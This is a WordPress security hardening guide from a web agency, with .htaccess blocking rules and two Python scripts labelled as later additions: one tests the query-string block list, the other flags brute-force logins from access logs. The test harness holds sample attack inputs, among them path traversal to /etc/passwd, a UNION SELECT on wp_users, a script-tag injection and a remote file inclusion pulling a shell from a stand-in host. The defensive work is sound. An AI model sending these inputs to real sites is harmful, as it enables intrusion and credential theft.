ROARlocal Ecommerce Agency

How To Make Your Website Hacker Proof

I’m Under Attack!

Every day you hear about some website or celebrity Twitter account being hacked. The Associated Press recently had its Twitter account hijacked by the Syrian Electronic Army, and the stock market fell 100 points as a result of a fake tweet that the White House had been bombed!

Donald Trump fell foul of prankster hackers with embarrassing consequences.

Mostly we ignore these and assume it will only happen to some big company’s website or Barack Obama’s Twitter account.

But, I’m here to tell you that every day your website is under attack.

The problem is, you just don’t realise it.

Think your business is too small or not significant enough to be a target? Think again.

Your website has one very valuable commodity that every SEO worth their salt wants: your backlinks.

Did you ever wonder how all those Russian and Chinese porn sites get ranked so well (assuming you’ve searched for the keywords, of course, ahem)?

Simple.

They break into unsuspecting websites like yours and plant hidden links all over the site, often cloaked so that only search engine crawlers see them. Unless you know where to look (the page source, your database, and your theme and plugin files) you’ll never find them. BUT Google does, and it will penalise your website for hosting them (costing you money through lower search engine rankings and higher PPC costs) and it will wreck your online reputation.

That’s only part of the problem. Most small-business websites are going to be built on WordPress. In fact, WordPress powers more websites than any other CMS, this one included!

Don’t get me wrong, we LOVE WordPress at ROARlocal and we encourage all our clients to use it, BUT WordPress’s own popularity has also made it the target of countless hacking efforts over the years.

With the latest version of WordPress having been downloaded well over sixty million times, WordPress-based sites present a rich opportunity for cyber criminals and malware distributors. An inadequately protected WordPress site can be used to host a variety of attacks, including redirects to malicious sites and drive-by downloads, and its database and uploads folder make a handy place to stash phishing pages and spam links.

However, we have come up with the following ways of closing the majority of WordPress’s obvious security holes, leaving your website less-than-ripe pickings for any would-be hacker.

So how can you make sure your WordPress website is hacker proof?

Here are 6 key steps to follow:

1. Always update WordPress to its latest stable version.

While this may seem like such common sense that it scarcely bears repeating, failing to update WordPress whenever a stable release is available is a fast track to a hacked blog. That applies just as much to your plugins and theme, which are where most WordPress break-ins actually start, since any one of them can carry a hole that no core update will close. Since WordPress 3.7, minor and security releases of core install themselves automatically unless that has been switched off; major releases, plugins and themes still need you to press the button, and anything you no longer use should be deleted rather than left deactivated.

Old versions of WordPress have been known to allow various types of extremely invasive attacks, such as the SQL injection exploit of June 6th 2007 that allowed hackers to gain access to entire databases worth of account user names and passwords. In this case, an entire month passed before the WordPress team remedied the situation with a security patch – and one can only imagine how further delay in installing that patch could open your site up to hacking efforts.

A 2007-era study concluded that all but a mere two percent of WordPress blogs were using outdated versions of WordPress and, therefore, vulnerable to a wide range of security attacks.

2. Set WordPress to avoid displaying its version number.

This goes hand-in-hand with keeping WordPress updated. Prevent potential hackers from knowing what version of WordPress you’re using, making it harder for them to figure out which exploits will work on your site. A simple addition to your theme’s functions.php file removes the hook that prints the version in the <meta name="generator"> tag of every page:

remove_action('wp_head', 'wp_generator');

Be aware that this only removes one of several tells: the version also appears in your RSS feed’s generator element and as the ?ver= parameter on the scripts and stylesheets WordPress enqueues, and /readme.html states it in plain text (delete that file or block it in .htaccess). Most automated attacks fire their exploit without checking the version at all, so treat this as a minor tidy-up, not a substitute for step 1.

3. Set register_globals to register_globals = Off.

This is a setting that many WordPress users take for granted because older hosting set-ups left it switched on by default. However, register_globals = on has a long and sordid history of being used to hack WordPress websites, including a series of January 2007 attacks that were used to force popular blogs to redirect to malicious sites. What it does is turn every request parameter into a PHP variable, so ?admin=1 in a URL can set $admin in a script that never initialised it. register_globals was deprecated in PHP 5.3 and removed in PHP 5.4, so on any current PHP version it no longer exists; if your host still runs something older, set register_globals = Off in php.ini (or php_flag register_globals off in .htaccess where PHP runs as an Apache module) and confirm the change with phpinfo().

Such redirects can send visitors to rogue security software such as Windows Malware Firewall and Windows Antivirus Rampart, or to other malware. We note that the hacker responsible for the January attacks characterised register_globals = on WordPress blogs as ‘easy targets.’

4. Use smart advertisement-management plugins to protect AdSense and other exploitable ads on your site.

While ads can be a great source of revenue, they can also be exploited by various methods, such as hacking attacks that swap out your ‘real’ AdSense ads for irrelevant pharmaceutical ads, or click-bombing attacks that flood AdSense with bogus clicks to get your account shut down.

Selectively using plugins like ‘Who Sees Ads’ or ‘Better WP Security’ to control where ads display and lock down ad-related settings can help to prevent such embarrassing incidents. However, you shouldn’t install plugins willy-nilly, either: every plugin is more code exposed to the internet, and some, such as AdSense Integrator, have a history of enabling the very types of attacks they’re supposed to protect against, which sends your ad revenue straight into criminal hands. Before installing any plugin, check when it was last updated and whether it is still maintained, and keep every plugin you do install updated as in step 1.

5. Edit your .htaccess file to tighten up its security.

By default, a stock .htaccess does nothing beyond WordPress’s permalink rewrites, and a few selective additions let you refuse whole classes of requests at the web-server level, before PHP ever runs. While there are numerous tweaks you can build into .htaccess, some of the most useful ones are noted here. The first denies all HTTP access to a single file:

<Files wp-config.php>
order allow,deny
deny from all
</Files>

These few lines guarantee that bots and any other visitor are barred from fetching wp-config.php (which holds your database password) over the web. Note that there is no wp-admin.php: wp-admin is a directory, and blocking it outright would lock you out too. The same <Files> block can be applied to other sensitive files such as install.php, the error_log that PHP leaves behind, and readme.html. On Apache 2.4 the equivalent of the two order/deny lines is the single directive Require all denied.

Another batch of rules inspects the query string of every request and answers 403 to anything that looks like a traversal, injection or cross-site scripting attempt, unless the visitor carries a WordPress login cookie. The regular expressions need their backslash escapes, which are easy to lose when copying, so they are shown here with the escaping in place:

RewriteEngine On
RewriteBase /
# Refuse HTTP methods a blog has no use for
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ - [F,L]
# Directory traversal and remote-file-inclusion style parameters
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag\= [NC,OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
# Script tags (plain or URL-encoded) and PHP code in parameters
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
# Metacharacters, raw control bytes and SQL keywords
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|ê|"|;|\?|\*|=$).* [NC,OR]
# quotes, angle brackets, pipe and braces (escaping on this line was lost in transcription; restored)
RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\||\{|\}).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]
# ...but only for visitors who are not logged in to WordPress
RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
RewriteRule ^(.*)$ - [F,L]

As a cautionary footnote, always back up your .htaccess file before editing it, in case your changes fail to function as intended and you need to roll back. A mistyped rewrite rule takes the whole site down with a 500 error, so test straight after saving. Be aware too of what this blacklist costs you: it only inspects the query string (POST bodies, where most form data travels, pass untouched); it blocks several perfectly legitimate WordPress requests for visitors who aren’t logged in, such as tag archives on ?tag= URLs, wp-login.php’s own ?redirect_to=http://... parameter, searches containing words like ‘select’ or ‘request’, and any search term with non-ASCII characters (because %C and %E match URL-encoded UTF-8); and refusing HEAD breaks some uptime monitors. Anything it blocks is trivially rewritten by an attacker who knows it’s there, so it reduces noise rather than fixing vulnerable code. Other types of .htaccess changes can blacklist bots and other unwanted visitors, block image and bandwidth-stealing content scrapers and stop would-be directory browsers.
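To see what this blacklist actually does before you deploy it, here is an added Python harness. It is not from the original post and not anything WordPress or Apache ship; it re-implements the query-string conditions above with Python’s re module and runs them over constructed query strings: the attack-style inputs the rules are meant for, and ordinary WordPress requests that the same rules refuse. Apache’s own engine is PCRE, so treat this as an approximation of mod_rewrite, not a substitute for testing on the server.

```python
import re

# Query-string conditions transcribed from the .htaccess block above, escaping restored.
# Apache evaluates them with [NC] (case-insensitive), OR-chains them, then ANDs the
# "no wordpress_logged_in_ cookie" condition before answering 403.
BLOCKED_METHODS = {"HEAD", "TRACE", "DELETE", "TRACK"}

QUERY_PATTERNS = [
    r"\.\./",                                   # directory traversal
    r"boot\.ini",
    r"tag=",                                    # also matches WordPress's own ?tag= archives
    r"ftp:",
    r"http:",                                   # also matches ?redirect_to=http://...
    r"https:",
    r"(<|%3C).*script.*(>|%3E)",                # <script> plain or URL-encoded
    r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)",
    r"base64_encode.*\(.*\)",
    r"^.*(\[|\]|\(|\)|<|>|ê|\"|;|\?|\*|=$).*",  # shell/regex metacharacters
    r"^.*(\"|'|<|>|\||\{|\}).*",                # quotes, angle brackets, pipe, braces
    r"^.*(%24&x).*",
    r"^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).*",      # %C/%E also match any URL-encoded UTF-8
    r"^.*(globals|encode|localhost|loopback).*",
    r"^.*(request|select|insert|union|declare).*",  # SQL keywords, also plain English
]
COMPILED = [(p, re.compile(p, re.IGNORECASE)) for p in QUERY_PATTERNS]


def is_blocked(method, query_string, logged_in=False):
    """Return the condition that would make mod_rewrite answer 403, or None if allowed.

    logged_in models the presence of a wordpress_logged_in_* cookie, which exempts
    the visitor from the query-string checks but not from the method check.
    """
    if method.upper() in BLOCKED_METHODS:
        return "method " + method.upper()
    if logged_in:
        return None
    for pattern, rx in COMPILED:
        if rx.search(query_string):      # RewriteCond is an unanchored search
            return pattern
    return None


def evaluate(requests, logged_in=False):
    """Map each query string to the condition that blocks it, or None."""
    return {qs: is_blocked(m, qs, logged_in) for m, qs in requests}


# Constructed inputs for the demonstration (not captured traffic).
ATTACKS = [
    ("GET", "page=../../../../etc/passwd"),
    ("GET", "file=..%2F..%2Fboot.ini"),
    ("GET", "id=1+union+select+user_pass+from+wp_users"),
    ("GET", "q=%3Cscript%3Ealert(1)%3C/script%3E"),
    ("GET", "mosConfig_absolute_path=http://evil.example/shell.txt"),
    ("TRACE", ""),
]
LEGITIMATE = [
    ("GET", "tag=security"),                               # tag archive, plain permalinks
    ("GET", "s=insert+key"),                               # a visitor searching for "insert key"
    ("GET", "s=caf%C3%A9"),                                # any non-ASCII search term
    ("GET", "redirect_to=http://example.com/wp-admin/"),   # wp-login.php's own redirect
    ("GET", "action=request_form"),                        # a plugin parameter containing "request"
    ("GET", "p=123"),                                      # an ordinary post: allowed
]

if __name__ == "__main__":
    for label, reqs in (("attack", ATTACKS), ("legitimate", LEGITIMATE)):
        for qs, hit in evaluate(reqs).items():
            print(f"{label:10} ?{qs:<50} -> {'403 ' + hit if hit else 'allowed'}")
```

Run it and five of the six legitimate requests come back 403; only ?p=123 gets through. That is the trade-off the cookie exemption papers over for you as the logged-in admin while your anonymous visitors and search crawlers hit it.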

6. Use encryption if it’s available.

In scenarios where you’re concerned about personal information (passwords, customer details) being intercepted in transit, use HTTPS, that is SSL/TLS encryption, to protect it. Before you do this you need a certificate installed on your web server, so check with your host what they support.

Once the certificate is in place, a single line in wp-config.php (not wp-admin.php, which doesn’t exist) will force every login and every admin page over HTTPS. Put it above the line that reads /* That's all, stop editing! */:

define('FORCE_SSL_ADMIN', true);

This covers wp-login.php and everything under wp-admin, which is where your password and your login cookie travel; to serve the public site over HTTPS as well, change the WordPress Address and Site Address settings to https:// URLs. If your host terminates TLS on a load balancer or proxy in front of the server, WordPress will not see the connection as secure and will redirect in a loop unless $_SERVER['HTTPS'] is set from the X-Forwarded-Proto header; the WordPress documentation on administration over SSL covers this.

As a parting note, we also encourage you to keep the e-mail address attached to your WordPress site current and to read what it sends you: WordPress and the plugins above mail you about new users, password resets, updates and blocked attacks. Hacking a WordPress blog isn’t the hardest thing in the world, but a silent attack that also suppresses those e-mail alerts is much harder to pull off than a ‘loud’ one, so an unexpected message is often your first warning.

Paying attention to symptoms of WordPress hacks and responding as quickly as possible should always be considered paramount for WordPress security – both for your sake and the sake of your site’s visitors.

That’s a lot I know, but believe me, you do not want your website hacked, and an ounce of prevention is worth a pound of cure, or to put it bluntly:

It’s bloody expensive to fix a site that’s been hacked!

So what else can you do?

Well, once your WordPress website is hacker proof it’s time to get busy on your hosting. If you’re using your own server (you should be) then you can get your webmaster to sign up to Project Honey Pot. This will give you an up-to-date listing of the IP addresses seen harvesting e-mail addresses, posting spam and attacking sites, like the ones below:

[Screenshot: Project Honey Pot’s list of attacking IP addresses]

As you can see, 80% of them originate in China, so it’s no surprise the US government is waging a war on Chinese hackers. Bear in mind, though, that a source address only tells you where the last hop was: much of this traffic comes from compromised servers and open proxies, not from the person at the keyboard.

Then, once you have the IPs, you simply go to your WHM control panel and add them in the security area to block them from reaching your site at all 🙂 Two caveats: attacker addresses change quickly, so a list you paste in by hand goes stale within days, and a blocked attacker can simply come back from another address. Treat the list as a nuisance filter, not as your main defence; the six steps above are what actually keep the site standing.

Simple!

 


If you’re using someone else’s hosting, log in to your cPanel and go to the Security section; the IP Deny Manager is at the bottom of this image:

[Screenshot: the cPanel Security section, with IP Deny Manager at the bottom]

Once there you can add the malicious IPs like this:

[Screenshot: adding an address in IP Deny Manager]

This is easier than you think and SUCH an important thing to do. It’s well worth either figuring it out for yourself or getting us to look after it for you.
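Blocking a published list of bad addresses is only the start: the addresses that matter most are the ones hammering your own wp-login.php. As an added example (not from the original post, and not a ROARlocal, cPanel or Project Honey Pot tool), here is a Python script that reads Apache combined-format access log lines, counts failed WordPress logins per client address inside a sliding time window, and emits the ‘deny from’ lines you would paste into the cPanel IP Deny Manager or an Apache 2.2 .htaccess. It also builds the DNS name for Project Honey Pot’s http:BL lookup, which is the live way to use their data rather than copying a list by hand. The log lines, the 12-character access key and the DNS answer are all constructed for the example; the RFC 5737 addresses are documentation ranges, not real visitors.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format: ip ident user [time] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def failed_logins(log_text, window_seconds=600):
    """Per client IP, the most failed wp-login.php POSTs seen within any window_seconds span.

    A failed WordPress login returns 200 (the form again, with an error); a successful one
    answers 302 to the admin, so only 200s are counted.
    """
    stamps = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; ignore it
        if m["method"] == "POST" and m["path"].startswith("/wp-login.php") and m["status"] == "200":
            stamps[m["ip"]].append(datetime.strptime(m["time"], TIME_FMT))
    peak = {}
    for ip, times in stamps.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):   # two-pointer sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        peak[ip] = best
    return peak


def offenders(peak, threshold=5):
    """Addresses whose burst of failures reached the threshold, sorted for stable output."""
    return sorted(ip for ip, n in peak.items() if n >= threshold)


def deny_rules(ips):
    """One 'deny from' line per address (cPanel IP Deny Manager / Apache 2.2 .htaccess syntax)."""
    return [f"deny from {ip}" for ip in ips]


def httpbl_query_name(ip, access_key):
    """DNS name to look up in Project Honey Pot's http:BL: key.reversed-octets.dnsbl.httpbl.org."""
    reversed_octets = ".".join(reversed(ip.split(".")))
    return f"{access_key}.{reversed_octets}.dnsbl.httpbl.org"


def parse_httpbl_answer(answer):
    """Decode an http:BL A record 127.<days since last seen>.<threat score>.<type bits>.

    Type bits: 1 = suspicious, 2 = harvester, 4 = comment spammer; 0 = search engine.
    An unlisted address gets NXDOMAIN, modelled here as answer=None.
    """
    if answer is None:
        return None
    first, days, score, kind = (int(x) for x in answer.split("."))
    if first != 127:
        raise ValueError("not an http:BL response")
    return {"days": days, "score": score,
            "suspicious": bool(kind & 1), "harvester": bool(kind & 2), "spammer": bool(kind & 4)}


# Constructed log sample: one real visitor, one slow prober, one brute-force burst.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [27/May/2013:11:00:01 +0100] "GET /about/ HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [27/May/2013:11:00:40 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/May/2013:10:05:00 +0100] "POST /wp-login.php HTTP/1.1" 200 3841 "-" "curl/7.29"',
    '198.51.100.23 - - [27/May/2013:11:55:00 +0100] "POST /wp-login.php HTTP/1.1" 200 3841 "-" "curl/7.29"',
] + [
    f'203.0.113.7 - - [27/May/2013:11:01:{s:02d} +0100] "POST /wp-login.php HTTP/1.1" 200 3841 "-" "-"'
    for s in range(2, 14, 2)   # six failed logins in twelve seconds
])

if __name__ == "__main__":
    bursts = failed_logins(SAMPLE_LOG)
    print("\n".join(deny_rules(offenders(bursts))))          # deny from 203.0.113.7
    print(httpbl_query_name("203.0.113.7", "abcdefghijkl"))  # placeholder access key
```

The window matters: the slow prober at 198.51.100.23 never reaches the threshold inside ten minutes, which is why a static threshold alone either misses patient attackers or blocks a customer who mistyped a password twice. Run the script from cron against the rotated log and feed the output into the deny list, and expire entries after a few days so the list does not grow forever.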

Then if anyone tries to hack your site you’ll get an e-mail like this:

[Screenshot: the alert e-mail sent when a blocked address tries to connect]

Make sure whoever is hosting your site has installed ClamAV (on cPanel servers it’s the ClamAV Scanner plugin), so that uploaded files and incoming mail are scanned for known malware. And a word to the wise: if you’re using cheap hosting you will need to do this yourself. That’s why your hosting is cheap (you get what you pay for).

Finally get your site monitored!

I use Sucuri to monitor all our sites. They check our sites every 4 hours for malware and if they detect anything they get rid of it! VERY nice. You can check them out here.

I’ve found them the best, and believe me, an ounce of prevention is worth thousands of pounds of cure!

I am WELL aware this is a very techy post but please don’t be put off by it.

This is important.

And as I said, we’re happy to take care of this for you. Just get in touch here

Neil

 
